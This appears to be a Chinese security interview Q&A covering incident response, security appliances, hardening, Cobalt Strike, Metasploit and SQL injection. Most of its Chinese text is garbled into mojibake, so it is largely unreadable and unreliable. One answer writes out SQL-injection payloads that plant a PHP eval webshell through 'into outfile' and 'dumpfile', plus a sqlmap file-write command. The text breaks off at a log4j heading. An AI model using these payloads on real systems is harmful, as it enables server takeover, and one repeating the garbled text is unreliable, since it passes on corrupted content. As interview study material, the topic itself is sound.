Ò». ×°±¸Îó±¨ÈçÄÇÀïÖã¿
´ð£º
À´×ÔÍâÍøµÄÎó±¨ËµÃ÷Çå¾²×°±¸ÐèÒª¾ÙÐÐÕ½ÂÔÉý¼¶£¬²»ÐèÒª´¦Öóͷ£¡£
ÈôÊÇÊÇÀ´×ÔÄÚÍøµÄÎ󱨿ÉÒÔºÍÈÏÕæÈËÐÉÌһϿ´Äܲ»¿É½â¾ö£¬ÓÐÐëÒªµÄ»°Ìí¼Ó°×Ãûµ¥´¦Öóͷ£¡£
¶þ. ÔõÑùÇø·ÖɨÃèÁ÷Á¿ºÍÊÖ¹¤Á÷Á¿£¿
´ð£º
1.ɨÃèÁ÷Á¿Êý¾ÝÁ¿´ó£¬ÇëÇóÁ÷Á¿ÓмÍÂÉ¿ÉÑÇÒÆµÂʽϸߣ¬ÊÖ¹¤Á÷Á¿ÇëÇóÉÙ£¬¾àÀëÂÔ³¤
2.ʹÓù¤¾ßɨÃèµÄÁ÷Á¿Ò»Ñùƽ³£ÔÚÊý¾Ý°üÖÐÓÐÏà¹ØÌØÕ÷ÐÅÏ¢£¬ºÃ±È˵ͨ¹ýwiresharkÍøÂç·â°üÆÊÎö¹¤¾ß¶ÔÁ÷Á¿¾ÙÐÐÒ»¸öÏêϸµÄÅŲéÆÊÎö£¬ºÃ±Èͨ¹ýhttp contains "xxx"À´²éÕÒÊý¾Ý°üÖеÄÒªº¦×Ö¡£

ºÃ±È³£ÓõÄÎó²îɨÃ蹤¾ßAWVS£¬NessusÒÔ¼°APPscanÔÚÇëÇóµÄURL£¬Headers, BodyÈýÏîÀïËæ»ú°üÀ¨ÁËÄÜ´ú±í×Ô¼ºµÄÌØÕ÷ÐÅÏ¢¡£
Èý. ÍøÕ¾±»ÉÏ´«webshellÈçÄÇÀïÖã¿
´ð£º
1.Ê×ÏȹرÕÍøÕ¾£¬ÏÂÏß·þÎñ¡£ÓÐÐëÒªµÄ»°½«·þÎñÆ÷¶ÏÍø¸ôÀë¡£
2.ÊÖ¹¤ÍŽṤ¾ß¾ÙÐмì²â¡£
¹¤¾ß·½ÃæºÃ±ÈʹÓÃD¶Üwebshellkill£¬ºÓÂíwebshell²éɱ£¬°Ù¶ÈÔÚÏßwebshell²éɱµÈ¹¤¾ß¶ÔÍøÕ¾Ä¿Â¼¾ÙÐÐÅŲé²éɱ£¬ÈôÊÇÊÇÔÚ»¤ÍøÊ±´ú¿ÉÒÔ½«Ñù±¾±¸·ÝÔÙ¾ÙÐвéɱ¡£
ÊÖ¹¤·½ÃæÁÙ±ÈδÉÏ´«webshellǰµÄ±¸·ÝÎļþ£¬´ÓÎļþÉõÖÁ´úÂë²ãÃæ¾ÙÐбÈÕÕ£¬¼ì²éÓÐÎÞºóÃųÌÐò»òÕ߯äËûÒì³£Îļþ£¬×Åʵ²»¿É¾ÍÖ±½ÓÓñ¸·ÝÎļþÌæ»»ÁË¡£
4.ÔöÇ¿Çå¾²Õ½ÂÔ£¬ºÃ±È°´ÆÚ±¸·ÝÍøÕ¾ÉèÖÃÎļþ£¬ÊµÊ±×°Ö÷þÎñÆ÷²¹¶¡£¬°´ÆÚ¸üÐÂ×é¼þÒÔ¼°Çå¾²·À»¤Èí¼þ£¬°´ÆÚÐÞ¸ÄÃÜÂëµÈµÈ²½·¥¡£
ËÄ. ¸øÄãÒ»¸ö½ÏÁ¿´óµÄÈÕÖ¾£¬Ó¦¸ÃÔõÑùÆÊÎö£¿
´ð£º
¹¥»÷¹æÔòÆ¥Åäͨ¹ýÕýÔòÆ¥ÅäÈÕÖ¾ÖеĹ¥»÷ÇëÇó
ͳ¼ÆÒªÁ죬ͳ¼ÆÇëÇó·ºÆð´ÎÊý£¬´ÎÊýÉÙÓÚͬÀàÇëÇ󯽾ù´ÎÊýÔòΪÒì³£ÇëÇó
°×Ãûµ¥Ä£Ê½£¬ÎªÕý³£ÇëÇó½¨Éè°×Ãûµ¥£¬²»ÔÚÃûµ¥¹æÄ£ÄÚÔòΪÒì³£ÇëÇó
HMM Ä£×Ó£¬ÀàËÆÓÚ°×Ãûµ¥£¬²î±ðµãÔÚÓڿɶÔÕý³£ÇëÇó×Ô¶¯»¯½¨ÉèÄ£×Ó£¬´Ó¶øÍ¨¹ýÕý³£Ä£×ÓÕÒ³ö²»Æ¥ÅäÕßÔòΪÒì³£ÇëÇó
ʹÓÃÈÕÖ¾ÆÊÎö¹¤¾ß£¬ÈçLogForensics£¬Graylog£¬Nagios£¬ELK StackµÈµÈ
Îå. ³£¼ûOAϵͳ£¿
´ð£º
PHP£ºÍ¨´ïOA¡¢·ºÎ¢ Eoffice
Java£º·ºÎ¢OA/ÔÆÇÅ¡¢ÖÂÔ¶OA¡¢À¶ÁèOA¡¢ÓÃÓÑOA
ASP£ºÆôÀ³OA
Áù. ÏàʶÇå¾²×°±¸Âð£¿
´ð£º
ÈëÇÖ·ÀÓùϵͳIPS
ÊÇÅÌËã»úÍøÂçÇå¾²ÉèÊ©£¬ÊǶԷÀ²¡¶¾Èí¼þºÍ·À»ðǽµÄÔö²¹¡£ÈëÇÖÔ¤·ÀϵͳÊÇÒ»²¿Äܹ»¼àÊÓÍøÂç»òÍøÂç×°±¸µÄÍøÂçÊý¾Ý´«ÊäÐÐΪµÄÅÌËã»úÍøÂçÇå¾²×°±¸£¬Äܹ»¼´Ê±µÄÖÐÖ¹¡¢µ÷½â»ò¸ôÀëһЩ²»Õý³£»òÊǾßÓÐΣÏÕÐÔµÄÍøÂçÊý¾Ý´«ÊäÐÐΪ¡£
ÈëÇÖ¼ì²âϵͳIDS
Æð¾¢×Ô¶¯µÄ·À»¤²½·¥£¬Æ¾Ö¤Ò»¶¨µÄÇå¾²Õ½ÂÔ£¬Í¨¹ýÈí¼þ£¬Ó²¼þ¶ÔÍøÂ磬ϵͳµÄÔËÐоÙÐÐʵʱµÄ¼à¿Ø£¬¾¡¿ÉÄܵط¢Ã÷ÍøÂç¹¥»÷ÐÐΪ£¬Æð¾¢×Ô¶¯µÄ´¦Öóͷ£¹¥»÷£¬°ü¹ÜÍøÂç×ÊÔ´µÄÉñÃØÐÔ£¬ÍêÕûÐԺͿÉÓÃÐÔ¡£
·À»ðǽ
·À»ðǽÊÇλÓÚÁ½¸ö(»ò¶à¸ö)ÍøÂç¼ä£¬ÊµÑéÍøÂç¼ä»á¼û»ò¿ØÖƵÄÒ»×é×é¼þÜöÝÍÖ®Ó²¼þ»òÈí¼þ¡£¸ôÀëÍøÂç£¬ÖÆ¶©³ö²î±ðÇøÓòÖ®¼äµÄ»á¼û¿ØÖÆÕ½ÂÔÀ´¿ØÖƲî±ðÐÅÍÐË®Æ½ÇøÓò¼ä´«Ë͵ÄÊý¾ÝÁ÷¡£
Êý¾Ý¿âÉó¼ÆÏµÍ³
ÊǶÔÊý¾Ý¿â»á¼ûÐÐΪ¾ÙÐÐî¿ÏµµÄϵͳ£¬Í¨¹ý¾µÏñ»òÕß̽ÕëµÄ·½·¨ÊÕÂÞËùÓÐÊý¾Ý¿âµÄ»á¼ûÁ÷Á¿£¬²¢»ùÓÚSQLÓï·¨£¬ÓïÒåµÄÆÊÎöÊÖÒÕ£¬¼Í¼Ï¶ÔÊý¾Ý¿âËùÓлá¼ûºÍ²Ù×÷ÐÐΪ£¬ÀýÈç»á¼ûÊý¾ÝµÄÓû§IP£¬Õ˺ţ¬Ê±¼äµÈµÈ£¬¶ÔÊý¾Ý¾ÙÐвÙ×÷µÄÐÐΪµÈµÈ¡£
ÈÕÖ¾Éó¼ÆÏµÍ³
ÈÕÖ¾Éó¼ÆÏµÍ³Äܹ»Í¨¹ýÖ÷±»¶¯ÍŽáµÄÊֶΣ¬ÊµÊ±ÇÒ²»ÖÐÖ¹µÄÊÕÂÞÓû§ÍøÂçÖвî±ð³§É̵ÄÇå¾²×°±¸£¬ÍøÂç×°±¸£¬Ö÷»ú£¬²Ù×÷ϵͳÒÔ¼°ÖÖÖÖÓ¦ÓÃϵͳ±¬·¢µÄº£Á¿ÈÕÖ¾ÐÅÏ¢£¬²¢½«ÕâЩÐÅÏ¢ËѼ¯µ½Éó¼ÆÖÐÐÄ£¬¾ÙÐм¯Öл¯´æ´¢£¬±¸·Ý£¬ÅÌÎÊ£¬É󼯣¬¸æ¾¯£¬ÏìÓ¦£¬²¢³ö¾ß¸»ºñµÄ±¨±í±¨¸æ£¬»ñÏ¤È«ÍøµÄÕûÌåÇå¾²ÔËÐÐÌ¬ÊÆ£¬Í¬Ê±Öª×ãµÈ±£¹ØÓÚÇå¾²ÖÎÀíÖÐÐĵÄÈÕÖ¾ÉúÑÄʱ¼ä´óÓÚ6¸öÔµÄÒªÇó¡£
±¤ÀÝ»ú
ÊÇÕë¶ÔÄÚ²¿ÔËάְԱµÄÔËάÇå¾²Éó¼ÆÏµÍ³¡£Ö÷Òª¹¦Ð§ÊǶÔÔËάְԱµÄÔËά²Ù×÷¾ÙÐÐÉó¼ÆºÍȨÏÞ¿ØÖÆ(ºÃ±ÈÒªµÇ¼ijЩƽ̨»òÕßϵͳֻÄÜͨ¹ý±¤ÀÝ»ú²Å¿ÉÒÔ£¬²»±Ø±¤ÀÝ»úÊÇÎÞ·¨»á¼ûµÄ)¡£Í¬Ê±±¤ÀÝ»úÉÐÓÐÕ˺ż¯ÖÐÖÎÀí£¬µ¥µãµÇ¼(ÔÚ±¤ÀÝ»úÉϵǼ¼´¿ÉʵÏÖ¶Ô¶à¸öÆäËûƽ̨µÄÎÞÃܵǼ)µÈ¹¦Ð§¡£
Îó²îɨÃèϵͳ
Îó²îɨÃ蹤¾ß»òÕß×°±¸ÊÇ»ùÓÚÎó²îÊý¾Ý¿â£¬Í¨¹ýɨÃèµÈÊֶζÔÖ¸¶¨µÄÔ¶³Ì»òÍâµØÅÌËã»úϵͳµÄÇ徲ųÈõÐÔ¾ÙÐмì²â£¬·¢Ã÷¿ÉʹÓÃÎó²îµÄÒ»ÖÖÇå¾²¼ì²âϵͳ(ÎÒÃdz£ÓõÄÕë¶ÔWEBÕ¾µã¾ÙÐÐɨÃèµÄ¹¤¾ßºÍ´Ë´¦Îó²îɨÃèϵͳ²»ÊÇÒ»¸ö¿´·¨)¡£
Êý¾ÝÇå¾²Ì¬ÊÆ¸Ð֪ƽ̨
ÒÔ´óÊý¾Ýƽ̨Ϊ»ù´¡£¬Í¨¹ýÍøÂç¶àÔª£¬Òì¹¹µÄº£Á¿ÈÕÖ¾£¬Ê¹ÓùØÁªÆÊÎö£¬»úеѧϰ£¬ÍþвÇ鱨£¬¿ÉÊÓ»¯µÈÊÖÒÕ£¬×ÊÖúÓû§Ò»Á¬¼à²âÍøÂçÇå¾²Ì¬ÊÆ£¬ÊµÏÖ´Ó±»¶¯·ÀÓùÏòÆð¾¢·ÀÓùµÄ½ø½×¡£
ÖÕ¶ËÇå¾²ÖÎÀíϵͳ
ÊǼ¯·À²¡¶¾£¬ÖÕ¶ËÇå¾²¹Ü¿Ø£¬ÖÕ¶Ë×¼È룬ÖÕ¶ËÉ󼯣¬ÍâÉè¹Ü¿Ø£¬EDRµÈ¹¦Ð§ÓÚÒ»Ì壬¼æÈݲî±ð²Ù×÷ϵͳºÍÅÌËã»úƽ̨£¬×ÊÖú¿Í»§ÊµÏÖÆ½Ì¨Ò»Ì廯£¬¹¦Ð§Ò»Ì廯£¬Êý¾ÝÒ»Ì廯µÄÖÕ¶ËÇå¾²Á¢Ìå·À»¤¡£
WAF
WAFÊÇÒÔÍøÕ¾»òÓ¦ÓÃϵͳΪ½¹µãµÄÇå¾²²úÆ·£¬Í¨¹ý¶ÔHTTP»òHTTPSµÄWeb¹¥»÷ÐÐΪ¾ÙÐÐÆÊÎö²¢×èµ²£¬ÓÐÓõĽµµÍÍøÕ¾Ç徲Σº¦¡£²úÆ·Ö÷Òª°²ÅÅÔÚÍøÕ¾·þÎñÆ÷µÄǰ·½¡£Í¨¹ýÌØÕ÷ÌáÈ¡ºÍ·Ö¿é¼ìË÷ÊÖÒÕ¾ÙÐÐģʽƥÅäÀ´µÖ´ï¹ýÂË£¬ÆÊÎö£¬Ð£ÑéÍøÂçÇëÇó°üµÄÄ¿µÄ£¬ÔÚ°ü¹ÜÕý³£ÍøÂçÓ¦Óù¦Ð§µÄͬʱ£¬×è¶ô»òÕß×è¶ÏÎÞЧ»òÕß²»·¨µÄ¹¥»÷ÇëÇó¡£
ÃÛ¹Þ
ÃÛ¹ÞÊÇÒ»ÖÖÇå¾²ÍþвµÄ×Ô¶¯·ÀÓùÊÖÒÕ£¬Ëüͨ¹ýÄ£ÄâÒ»¸ö»ò¶à¸öÒ×Êܹ¥»÷µÄÖ÷»ú»ò·þÎñÀ´ÎüÒý¹¥»÷Õߣ¬²¶»ñ¹¥»÷Á÷Á¿ÓëÑù±¾£¬·¢Ã÷ÍøÂçÍþв£¬ÌáÈ¡ÍþÐ²ÌØÕ÷£¬Ã۹޵ļÛÖµÔÚÓÚ±»Ì½²â£¬¹¥ÏÝ¡£
Æß. Ïàʶ¹ýϵͳ¼Ó¹ÌÂð£¿
´ð£º
ÕË»§Çå¾²
windows
ºÃ±ÈÉèÖõǼʱ²»ÏÔʾÉϴεǼµÄÓû§Ãû£¬±ÜÃâÈõ¿ÚÁî±¬ÆÆ¡£
ÉèÖÃÕË»§Ëø¶¨Õ½ÂÔ£¬ºÃ±È˵µÇ¼ÐÐΪÏÞÖÆ´ÎÊý£¬µÖ´ï´ÎÊýºóËø¶¨¶à³¤Ê±¼ä¡£
linux
½ûÓÃrootÖ®ÍâµÄ³¬µÈÓû§ ʹÓÃpassword -l <Óû§Ãû>ÏÂÁîÀ´Ëø¶¨Óû§ -u½âËø
ÏÞÖÆÍ¨Ë×Óû§Ê¹ÓÃsudoÌáȨ£¬»òÕß˵ÏÞÖÆÌáȨµÄȨÏÞ¾Þϸ
Ëø¶¨ÏµÍ³ÖжàÓàµÄ×Ô½¨Õ˺Å
ÉèÖÃÕË»§Ëø¶¨µÇ¼ʧ°ÜËø¶¨´ÎÊý£¬Ëø×¼Ê±¼ä faillog -u <Óû§Ãû>ÏÂÁîÀ´½âËøÓû§
¿ÚÁîÇå¾²
windows
ÉèÖÃÃÜÂë±ØÐèÇкÏÖØ´óÐÔÒªÇ󣬺ñÈÉèÖÃʱÊý×Ö£¬´óд×Öĸ£¬Ð¡Ð´×Öĸ£¬ÌØÊâ×Ö·û¶¼Òª¾ß±¸
ÉèÖÃ×îСÃÜÂ볤¶È²»¿ÉΪ0£¬ÉèÖò»¿ÉʹÓÃÀúÊ·ÃÜÂë
linux
¼ì²éshadowÖпտÚÁîÕ˺ţ¬Ð޸ĿÚÁîÖØÆ¯ºó£¬ÉèÖÃÃÜÂëÓÐÓÃÆÚvim /etc/login.defÏÂÁî
·þÎñÓë¶Ë¿ÚÊÕÁ²
¹Ø±Õ»òÕßÏÞÖÆ³£¼ûµÄ¸ßΣ¶Ë¿Ú£¬ºÃ±È˵22¶Ë¿Ú(SSH)£¬23¶Ë¿Ú(Telnet)£¬3389¶Ë¿Ú(RDP)
compmgmt.mscÅŲéÍýÏëʹÃü
linuxÉÏiptables·â½ûIP»òÕßÏÞÖÆ¶Ë¿Ú
ÎļþȨÏÞÖÎÀí
linuxÉÏchmodÐÞ¸ÄÎļþȨÏÞ chattrÖ÷ÒªÎļþÉèÖò»¿ÉÐÞ¸ÄȨÏÞ
ϵͳÈÕÖ¾Éó¼Æ
linuxÉÏÉèÖÃϵͳÈÕÖ¾Õ½ÂÔÉèÖÃÎļþ
ϵͳÈÕÖ¾ /var/log/message
cronÈÕÖ¾/var/log/cron
Çå¾²ÈÕÖ¾/var/log/secure
×°±¸ºÍÍøÂç¿ØÖÆ
ºÃ±ÈÔÚÉæÃÜÅÌËã»úÉÏեȡ»á¼ûÍâÍø£¬ÎªÁË×èÖ¹Óû§ÈƹýÕ½ÂÔ¿ÉÒÔեȡÓû§ÐÞ¸ÄIP
ɾ³ýĬÈÏ·ÓÉÉèÖã¬×èֹʹÓÃĬÈÏ·ÓÉ̽²âÍøÂç
եȡʹÓÃUSB×°±¸ºÃ±ÈUÅÌ
եȡpingÏÂÁ¼´½ûÓÃICMPÐÒé»á¼û£¬²»ÈÃÍⲿpingͨ·þÎñÆ÷
°Ë. ÓÐûÓÐÇå¾²×°±¸µÄʹÓÃÂÄÀú£¿
´ð£º
Ì¬ÊÆ¸ÐÖª»òÕß˵Çå¾²ÔËÓª·½Ã濪ԴÏîÄ¿OSSIM¡£
IPS(ÈëÇÖ·ÀÓùϵͳ)·½ÃæSnortºÍÇå¾²Ñó´ÐSecurity Onion¡£
·À»ðǽ·½ÃæTinyWallºÍClearOS£¬»òÕß˵Ïñ»ðÈÞ£¬ÌÚѶÇå¾²¹Ü¼ÒµÈһЩͨÀýµÄ·À»¤Èí¼þ¡£
WAF£¨WebÓ¦Ó÷À»ðǽ £©·½ÃæModSecurityºÍÍøÕ¾Çå¾²¹·ÒÔ¼°¸¡Í¼¡£
ÍþвÇ鱨·½ÃæMISPºÍOpenCTI¡£
Îó²îɨÃè·½ÃæOpenVAS£¬Õë¶ÔwebÕ¾µãµÄÎó²îɨÃ蹤¾ßʹÓùýAWVS£¬Nessus
±¤ÀÝ»ú·½ÃæJumpServer(linuxϵͳװÖ㬵«¿ÉÒÔÌí¼ÓwindowsÖ÷»ú×÷Ϊ×ʲú)¡£
ÃÛ¹Þ·½ÃæT-Pot(»ùÓÚLinuxϵͳװÖÃ)ºÍ΢²½µÄHfish¡£
¾Å. CSÊÇʲô¹¤¾ß£¬ÖªµÀÔõôʹÓÃÂð£¿
´ð£º
¼ò½é
CobaltStrikeÊÇÒ»¿îÉøÍ¸²âÊÔ¹¤¾ß£¬±»Òµ½çÈ˳ÆÎªCS¡£CobaltStrike·ÖΪ¿Í»§¶ËÓë·þÎñ¶Ë£¬·þÎñ¶ËÊÇÒ»¸ö£¬¿Í»§¶Ë¿ÉÒÔÓжà¸ö£¬¿ÉÓÃÓÚÍŶÓÂþÑÜʽÐͬ²Ù×÷¡£
¹¦Ð§
CobaltStrike ¼¯³ÉÁ˶˿Úת·¢£¬·þÎñɨÃ裬×Ô¶¯»¯Òç³ö£¬¶àģʽ¶Ë¿Ú¼àÌý£¬windows exe ľ ÂíÌìÉú£¬windows dll ľÂíÌìÉú£¬java ľÂíÌìÉú£¬office ºê²¡¶¾ÌìÉú£¬Ä¾ÂíÀ¦°ó¡£´¹ÂÚ¹¥»÷µÈ¹¦Ð§¡£
ʹÓÃ
Ò»Ñùƽ³£Ê¹Óð취¾ÍÊÇ£¬ÏÈÆô¶¯·þÎñ¶Ë£¬È»ºóÆô¶¯¿Í»§¶ËÅþÁ¬»ñµÃÒ»¸ö¿ÉÊÓ»¯µÄ½çÃæ£¬Ð½¨¼àÌýÆ÷À´ÎüÊջỰ£¬ÌìÉúľÂíÎļþ(³£¼û.exe¿ÉÖ´ÐÐÎļþ£¬officeºê²¡¶¾£¬htmlÓ¦ÓóÌÐòÀàÐ͵ĺóÃÅÎļþ)£¬ÉÏ´«µ½Êܺ¦ÕßÖ÷»ú£¬µ±Êܺ¦ÕßÔËÐиÃľÂíÎļþʱĿµÄÖ÷»ú¾ÍÔÚCSÉÏÏßÁË¡£
Ê®. WAF·½ÃæÓÐûÓÐÏàʶ¹ý£¬ÇåÎúWAFµÄ·ÖÀàºÍÔÀíÂð£¿
´ð£º
·ÖÀࣺ
WAF·ÖΪ·ÇǶÈëÐÍWAFºÍǶÈëÐÍWAF£¬·ÇǶÈëÐÍÖ¸µÄÊÇÓ²WAF¡¢ÔÆWAF¡¢ÐéÄâ»úWAFÖ®ÀàµÄ£»Ç¶ÈëÐÍÖ¸µÄÊÇwebÈÝÆ÷Ä£¿éÀàÐÍWAF¡¢´úÂë²ãWAF¡£
ÔÀí£º
WebÓ¦Ó÷À»ðǽÊÇͨ¹ýÖ´ÐÐһϵÁÐÕë¶ÔHTTP»òÕßHTTPSµÄÇå¾²Õ½ÂÔÀ´×¨ÃÅΪWebÓ¦ÓÃÌṩ±£»¤µÄÒ»¿î²úÆ·¡£WAF¶ÔÇëÇóµÄÄÚÈݾÙÐйæÔòÆ¥Åä¡¢ÐÐΪÆÊÎöµÈʶ±ð³ö¶ñÒâÐÐΪ£¬²¢Ö´ÐÐÏà¹ØÐж¯£¬ÕâЩÐж¯°üÀ¨×è¶Ï¡¢¼Í¼¡¢¸æ¾¯µÈ¡£
ʮһ. PowershellÏàʶ¹ýÂð£¿
´ð£º
¼ò½é
PowerShell ÊÇÒ»ÖÖÏÂÁîÐÐÍâ¿Ç³ÌÐòºÍ¾ç±¾ÇéÐΣ¬Ö÷ÒªÓÃÓÚWindowsÅÌËã»úÀû±ãÖÎÀíÔ±¾ÙÐÐϵͳÖÎÀí²¢ÓпÉÄÜÔÚδÀ´È¡´úWindowsÉϵÄĬÈÏÏÂÁîÌáÐÑ·û¡£PowerShell¾ç±¾ÒòÆäÓÅÒìµÄ¹¦Ð§ÌØÕ÷³£ÓÃÓÚÕý³£µÄϵͳÖÎÀíºÍÇå¾²ÉèÖÃÊÂÇé¡£
ʹÓÃ
³£¼ûµÄ²Ù×÷ pwd ls cd mkdir rm
get-process»ñÈ¡ËùÓÐÀú³ÌÐÅÏ¢
get-date»ñȡĿ½ñʱ¼äÐÅÏ¢
get-host»ñȡĿ½ñÖ÷»úÐÅÏ¢
È»ºó¾ÍÊÇʹÓÃPowersSploit(»ùÓÚPowershellµÄºóÉøÍ¸¿ò¼ÜÈí¼þ£¬°üÀ¨ÁËÐí¶àPower shell¹¥»÷¾ç±¾£¬Ö÷ÒªÓÃÓÚÉøÍ¸ÖеÄÐÅÏ¢ÍøÂ磬ȨÏÞÌáÉý£¬È¨ÏÞά³Ö)µÄʱ¼äÔÚPowshellÉÏʹÓùýһЩÏÂÔØºÍÔËÐй¥»÷¾ç±¾µÄÏÂÁî¡£
Ê®¶þ. MSFÊÇʲô£¿ÖªµÀÔõôʹÓÃÂð£¿
´ð£º
¼ò½é£º
Metasploit Framework(MSF)ÊÇÒ»¿î¿ªÔ´Çå¾²Îó²î¼ì²â¹¤¾ß£¬¸½´øÊýǧ¸öÒÑÖªµÄÈí¼þÎó²î£¬²¢¼á³ÖÒ»Á¬¸üС£Metasploit¿ÉÒÔÓÃÀ´ÐÅÏ¢ÍøÂç¡¢Îó²î̽²â¡¢Îó²îʹÓõÈÉøÍ¸²âÊÔµÄÈ«Á÷³Ì¡£
Ä£¿é£º
Auxiliary£¨¸¨ÖúÄ£¿é£©
ÎªÉøÍ¸²âÊÔÐÅÏ¢ËѼ¯ÌṩÁË´ó×ڵĸ¨ÖúÄ£¿éÖ§³Ö
Exploits£¨¹¥»÷Ä£¿é£©
ʹÓ÷¢Ã÷µÄÇå¾²Îó²î»òÉèÖÃÈõµã¶ÔÔ¶³ÌÄ¿µÄϵͳ ¾ÙÐй¥»÷£¬´Ó¶ø»ñµÃ¶ÔÔ¶³ÌÄ¿µÄϵͳ»á¼ûȨµÄ´úÂë×é¼þ¡£
Payload£¨¹¥»÷ÔØºÉÄ£¿é£©
¹¥»÷Àֳɺó´Ùʹ°Ð»úÔËÐеÄÒ»¶ÎÖ²Èë´úÂë
Post £¨ºóÉøÍ¸¹¥»÷Ä£¿é£©
ÍøÂç¸ü¶àÐÅÏ¢»ò½øÒ»²½»á¼û±»Ê¹ÓõÄÄ¿µÄϵͳ
Encoders£¨±àÂëÄ£¿é£©
½«¹¥»÷ÔØºÉ¾ÙÐбàÂ룬À´Èƹý·À»¤Èí¼þ×èµ²
ʹÓãº
Ê×ÏÈʹÓÃAuxiliary¸¨Öú̽²âÄ£¿éɨÃ裬Ðá̽£¬Ö¸ÎÆÊ¶±ðÏà¹ØÎó²î£¬È»ºóÈ·ÈÏÎó²î±£´æÊ¹ÓÃExploitÎó²îʹÓÃÄ£¿é¶ÔÎó²î¾ÙÐÐʹÓ㬰üÀ¨ÉèÖÃpayload¹¥»÷ÔØºÉ£¬ÉèÖñ¾»ú¼àÌýµÈµÈ¡£Îó²îʹÓÃÀÖ³ÉÄ¿µÄÖ÷»ú¾Í»áͨ¹ýÉèÖõĶ˿Ú×Ô¶¯ÅþÁ¬£¬±¬·¢»á»°¡£½ø¶ø¿ÉÒÔ¾ÙÐкóÉøÍ¸¡£
¹¦Ð§£º
ľÂíÃâɱ£¬×¥È¡Óû§ÃÜÂ룬¹Ø±Õɱ¶¾Èí¼þ£¬ÆÁÄ»½ØÍ¼£¬Ð½¨Õ˺ţ¬Ô¶³ÌµÇ¼£¬Ç¨áãÀú³Ì£¬ÌáȨ²Ù×÷£¬ÍøÂçÐá̽£¬¶Ë¿Úת·¢ £¬ÄÚÍøÊðÀí£¬ÄÚÍøÉ¨Ã裬ÌìÉúºóÃÅ£¬É¨³ýÈÕÖ¾µÈµÈ¡£
Ê®Èý. ʹÓùýʲôXSSƽ̨Âð£¿
´ð£º
1.Ç廪À¶Á«»¨Õ½¶ÓµÄBlueLotus¡£
2.xss-platformƽ̨¡£
2.kaliÖеÄbeefƽ̨¡£
3.ʹÓù¤¾ßPostman¡£
Ê®ËÄ. SQL×¢ÈëÔõôдÈëwebshell£¿
´ð£º
Ìõ¼þ£º
1¡¢ÖªµÀweb¾ø¶Ô·¾¶
2¡¢ÓÐÎļþдÈëȨÏÞ(Ò»Ñùƽ³£ÇéÐÎÖ»ÓÐROOTÓû§ÓÐ)
3¡¢Êý¾Ý¿â¿ªÆôÁËsecure_file_privÉèÖÃ
È»ºó¾ÍÄÜÓÃselect into outfileдÈëwebshell
³£¼ûÊÖ·¨£º
ÍŽá×¢ÈëдÈë
?id=1' union select 1,"<?php @eval($_POST['shell']);?>",3 into outfile 'C:\\phpstudy\\WWW\\sqli\\shell.php'#
dumpfileº¯ÊýдÈë
?id=1' union select 1,"<?php @eval($_POST['shell']);?>",3 into dumpfile 'C:\\phpstudy\\WWW\\sqli\\shell.php'#
lines terminated by дÈë
?id=1 into outfile 'C:/wamp64/www/shell.php' lines terminated by '<?php phpinfo()?>';
//lines terminated by ¿ÉÒÔÃ÷ȷΪ ÒÔÿÐÐÖÕÖ¹µÄλÖÃÌí¼Ó xx ÄÚÈÝ¡£
lines starting by дÈë
?id=1 into outfile 'C:/wamp64/www/shell.php' lines starting by '<?php phpinfo()?>';//ʹÓà lines starting by Óï¾äÆ´½ÓwebshellµÄÄÚÈÝ¡£lines starting by ¿ÉÒÔÃ÷ȷΪ ÒÔÿÐÐ×îÏȵÄλÖÃÌí¼Ó xx ÄÚÈÝ¡£
fields terminated by дÈë
?id=1 into outfile 'C:/wamp64/www/work/shell.php' fields terminated by '<?php phpinfo() ?>';//ʹÓà fields terminated by Óï¾äÆ´½ÓwebshellµÄÄÚÈÝ¡£fields terminated by ¿ÉÒÔÃ÷ȷΪ ÒÔÿ¸ö×ֶεÄλÖÃÌí¼Ó xx ÄÚÈÝ¡£
columns terminated by дÈë
?id=1 into outfile 'C:/wamp64/www/shell.php' COLUMNS terminated by '<?php phpinfo() ?>';//ʹÓà fields terminated by Óï¾äÆ´½ÓwebshellµÄÄÚÈÝ¡£fields terminated by ¿ÉÒÔÃ÷ȷΪ ÒÔÿ¸ö×ֶεÄλÖÃÌí¼Ó xx ÄÚÈÝ¡£
sqlmapдÈë
д£º(ҪдµÄÎļþ£¬±ØÐèÔÚkali±¾»úÀïÓÐ)дÈëµ½ /tmp Ŀ¼Ï sqlmap -u "http://127.0.0.1/index.php?page=user-info.php&username=a%27f%27v&password=afv&user-info-php-submit-button=View+Account+Details" -p 'username' --file-write="shell.php" --file-dest="/tmp/shell.php"
Ê®Îå. Ïàʶ¹ý·´ÐòÁл¯Îó²îÂð£¿
´ð£º
ÔÀí£º
ÐòÁл¯ÊÇÖ¸³ÌÐò½«¹¤¾ßת»¯Îª×Ö½ÚÐòÁдӶø±ãÓÚ´æ´¢ÔËÊäµÄÒ»ÖÖ·½·¨£¬·´ÐòÁл¯ÔòÓëÆäÏà·´£¬¼´½«×Ö½ÚÐòÁÐת»¯Îª¹¤¾ß¹©³ÌÐòʹÓᣳÌÐòÔÚ¾ÙÐз´ÐòÁл¯Ê±»áŲÓÃһЩº¯Êý£¬ºÃ±È³£¼ûµÄPHP·´ÐòÁл¯º¯Êýunserialize()ÒÔ¼°Ò»Ð©³£¼ûµÄħÊõÒªÁ죬ºÃ±È½á¹¹º¯Êý_construct()£¬Îö¹¹º¯Êý_destruct()£¬_wakeup()£¬_toString()£¬_sleep()µÈµÈ¡£ÈôÊÇÕâЩº¯ÊýÔÚת´ï²ÎÊýʱûÓоÙÐÐÑÏ¿áµÄ¹ýÂ˲½·¥£¬ÄÇô¹¥»÷Õ߾ͿÉÒԽṹ¶ñÒâ´úÂë²¢½«ÆäÐòÁл¯ºó´«È뺯ÊýÖУ¬´Ó¶øµ¼Ö·´ÐòÁл¯Îó²î¡£
Java·´ÐòÁл¯
Java·´ÐòÁл¯¾ÍÊǽ«java¹¤¾ßת»¯Îª×Ö½ÚÐòÁеÄÀú³Ì¡£·´ÐòÁл¯µÄÀú³Ì¾ÍÊÇ
1£¬½¨ÉèÒ»¸ö¹¤¾ßÊä³öÁ÷
2£¬Í¨¹ý¹¤¾ßÊä³öÁ÷µÄReadObject()ÒªÁìÀ´¶ÁÈ¡¹¤¾ß
Ê®Áù. ³£¼ûµÄ¿ò¼ÜÎó²î£¿
´ð£º
log4jÔ¶³Ì´úÂëÖ´ÐÐÎó²î
ÔÀí£º
